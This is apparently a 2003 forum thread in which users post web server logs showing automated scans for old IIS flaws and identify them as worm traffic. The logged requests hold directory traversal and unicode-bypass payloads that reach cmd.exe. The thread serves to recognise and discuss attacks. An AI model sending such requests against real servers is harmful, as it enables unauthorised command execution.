uber-l33t h4x0r

UserLoser · September 08, 2003, 07:35 PM

Found this in my log from my webserver running on my computer, I found it funny

12.211.62.105 - - [08/Sep/2003:02:01:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:01:59 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:00 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
12.211.62.105 - - [08/Sep/2003:02:02:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
12.211.62.105 - - [08/Sep/2003:02:02:03 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268

Yoni · September 08, 2003, 07:46 PM

Looks like a script kiddie scanning for well known IIS holes. I wonder what all those holes are.

Grok · September 08, 2003, 08:07 PM

vL.com gets those daily, and many more.

I've seen most of those for 3+ years.

The ..%255c../ looks like it is trying to exploit both parent paths and unicode bypass exploit at the same time.

The MSADC is an exploitable sample site that is installed with II4 and IIS5, which allow increased permissions to the attacker.

The rest of it is a lot of pecking around for figuring out your architecture.

UserLoser · September 08, 2003, 08:43 PM

Hmm, I'm only Windows XP Home Edition, and that's an Abyss Web Server. I don't think by doing that they can confuse the server or get past it or whatever - But, I don't know anything about website/server cracking

iago · September 08, 2003, 08:50 PM

I scanned his ip with thing's scanner, found nothing sadly

UserLoser · September 08, 2003, 08:55 PM

My IP or his?

iago · September 08, 2003, 08:59 PM

I only see one ip.. assumed it was his

UserLoser · September 08, 2003, 08:59 PM

Oh it is his, but I thought since you're a moderator, you could have gotten my IP

Thing · September 09, 2003, 07:48 AM

Those 14 entries are the signature of a machine infected with CodeRed. It is trying to infect yours.

$torm made a fine script on one of my boxes which searches the Apache access log and copies CodeRed entries to a text file. Here is a small portion of that file:

Code Select

63.225.238.53 - - [08/Sep/2002:00:47:11 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:12 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:13 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 712
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779
63.225.238.53 - - [08/Sep/2002:00:47:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 779

UserLoser · September 09, 2003, 03:30 PM

Nobody infects my computer!

Fr0z3N · September 10, 2003, 08:38 PM

Code Select

134.202.1.149 - - [10/Sep/2003:21:23:44 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -

Only one I saw. But I'm to lazy to look through them all.

On Apache, Thing wanna send me that file by $torm?

Thing · September 10, 2003, 09:19 PM

QuoteOn Apache, Thing wanna send me that file by $torm?

You should ask him. He wrote it.

Fr0z3N · September 11, 2003, 06:43 AM

where would I see him to ask?

Thing · September 11, 2003, 07:51 AM

PM this guy.

uber-l33t h4x0r

UserLoser

UserLoser

UserLoser

UserLoser

UserLoser